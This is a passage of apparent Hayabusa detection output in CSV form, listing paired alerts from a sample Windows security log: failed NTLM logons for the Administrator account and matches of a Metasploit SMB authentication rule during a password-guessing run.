Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AchwW4ifbZ41AQNg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.790 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1PaxF7Q8ue1Kex1h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.842 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WAhW2PErXdwNVrx5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.888 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.943 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LoAV3ESqieev2JMC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.943 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wFlWFijaFirgsAtJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.012 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hSDjuqvzKLaWCWVo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.049 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SL0CVu787iFRLiPU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.109 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZQDORN33izpv4tGO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.219 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v470yorD43fgGyjC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.253 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LBbLWVZFDqFxb7dW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.305 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.360 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RJsowt9MrhXciLOZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.360 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.404 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uhCVFyMmDI5shASV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.404 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yd4SM9EGM7cnO6Z5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.452 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.490 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PSR1tbtzdDaJDbXs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.490 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rNqyjBuN0Pq6WRO1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.538 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vqpMAmE9OvHbFCh2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.585 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JfLQAaB0DPvxWQMB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.632 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A0kvHMwnj2k0HMLQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.676 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kPqfVDftcR4iRDaw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1bltwm2g13InAJM6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.748 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J2iFr8ppe5NzukXF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.788 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7EEUOBohBFRze6hL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.842 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.887 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NCOFn3WM71KmaZyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.887 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UdUkBxB1auduRfdS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.928 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E2JaWoYK56HRGfW1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.980 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.015 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a3JTCX9NIOpg6TFB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.015 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zFGkdUVAdKcrrREB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.064 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7oZW00FpKema01Vw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.108 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.151 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p4HbNQx0Acf83b1h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.151 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9aM5UCQbOLvcpI0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BGGChEAIdej9lBhr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.238 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4CaFYB1ImWAWbH0W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OLa3lkxWiJ00raQh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.320 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vMzyi0jIVLNrodC8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n2repX0roAP2j0TI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.409 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gqcpIjdkNpmoTe4A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.460 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.488 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Edgo9UdNvmMJpiyn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.488 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LpqOTu7Xn7ULipmN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.532 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.567 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TP0efL79STMbuu9g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.567 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HkwWfRi0E5sVY6UT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.610 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IkyCe9NXGExCQS5r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.698 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IGnhRwa7P7by9vJO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.698 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fh7IGliNbSyKwxpM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.740 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.782 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1QfgWsAqSYQfB9l5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.782 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.821 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q8VM66P8Vluf7yrL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.821 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cdYiwh3QjdA0Zoge : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.861 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ou3FPUI5bFcUvuFC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.904 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 